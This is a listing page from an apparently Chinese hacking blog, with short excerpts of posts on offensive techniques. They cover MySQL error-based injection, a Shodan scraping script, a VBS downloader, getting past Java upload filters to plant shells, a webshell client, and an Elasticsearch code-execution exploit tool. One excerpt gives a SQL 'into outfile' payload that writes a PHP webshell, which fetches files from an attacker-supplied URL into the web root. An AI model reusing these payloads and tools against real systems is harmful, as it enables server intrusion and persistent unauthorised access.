PHP & Java

Open The Door,SF Express!!

[f4ck-Mramydnei]新型Mysql报错注入

Anonymous
Documents
1688 阅读
0 评论

from:https://rdot.org/forum/showthread.php?t=3167、http://sb.f4ck.org/thread-19159-1-1.html原文是俄文,不好做翻译,附上大概的内容:这种报错注入主要基于Mysql数据类型溢出 mysql > SELECT 18446744073709551610 * 2 ; ERROR 1690 ( 22003 ): B...

阅读全文

shodanhq.js

yzmm
Tools
1107 阅读
0 评论

登陆状态下,切换到chrome控制台: var url = "http://www.shodanhq.com/search?q=关键字&page="; for(var i=1;i<101;i++){ var request = null; if (window.ActiveXObject) { request = new ActiveXObject("M...

阅读全文

vbs文件下载小脚本

yzmm
Tools
1169 阅读
0 评论

linux很方便可以直接wget,windows用vbs下载挺方便的。随便在网上找了个小脚本改了下就ok了。 命令行下执行参数url:cscript 1.vbs /url:http://www.baidu.com/img/bdlogo.gif '执行后下载到当前目录:cscript 1.vbs /url:http://www.baidu.com/img/bdlogo.gif Set xP...

阅读全文

JavaFilter Filter“绕过”问题

yzmm
Documents
1157 阅读
1 评论

一般人喜欢用: request.getRequestURI(); 然后再判断这个URI是否合法,其实这个写法存在弊端。很简单当请求/upload/index.jsp,由于默认的web.xml默认一般指定了index.jsp为索引文件。所以访问/upload/一样可以访问到这个jsp。只有可以绕过通过Filter拦截upload目录下的所有.jsp访问。上传shell的时候可以试试把文件名改成:in...

阅读全文

acat.jar 迷你WebServer自带菜刀java版

yzmm
Tools
891 阅读
0 评论

下载:ACat-jdk1.5.jar、ACat-附数据库驱动-jdk1.5.jar、 ACat-jdk.1.7.jar、ACat-附数据库驱动.jar 源码:ACat-src.zip 描述: 这是一个用java实现的非常小(18kb)的webServer。之前在drops发了一个简单的demo:http://drops.wooyun.org/papers/869。这个也非常简单,只实现了几个ser...

阅读全文

[更新]Elasticsearch 代码执行漏洞利用工具

yzmm
Web Applications
1432 阅读
5 评论

更新地址:Elasticsearch_1.2.jar 命令参数忘记编码了,导致不能执行多参数已修复了。修改了超时为10秒、异常情况直接输出页面源码。 1、ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。 2、Lucene是apache软件基金会4 jakarta项目组的一个子项目,是一个...

阅读全文

php shell

yzmm
Documents
569 阅读
0 评论

sql: select '<?php file_put_contents(dirname(__FILE__)."/".$_GET[\'file\'], file_get_contents($_GET[\'url\']));?>' into outfile'/var/www/html/xxx/dat...

阅读全文

java.io.File.renameTo文件系统问题

yzmm
Java
706 阅读
0 评论

java.io.File中的renameTo方法尽量少用,因为可能会出现文件系统不一致问题导致文件移动失败。具体可能出现的问题包括:1、NTFS、FAT32 分区格式问题。2、文件分隔符问题\\和/。3、rename的文件存在。 public boolean renameTo(File dest) { SecurityManager security = System.getSecurityMan...

阅读全文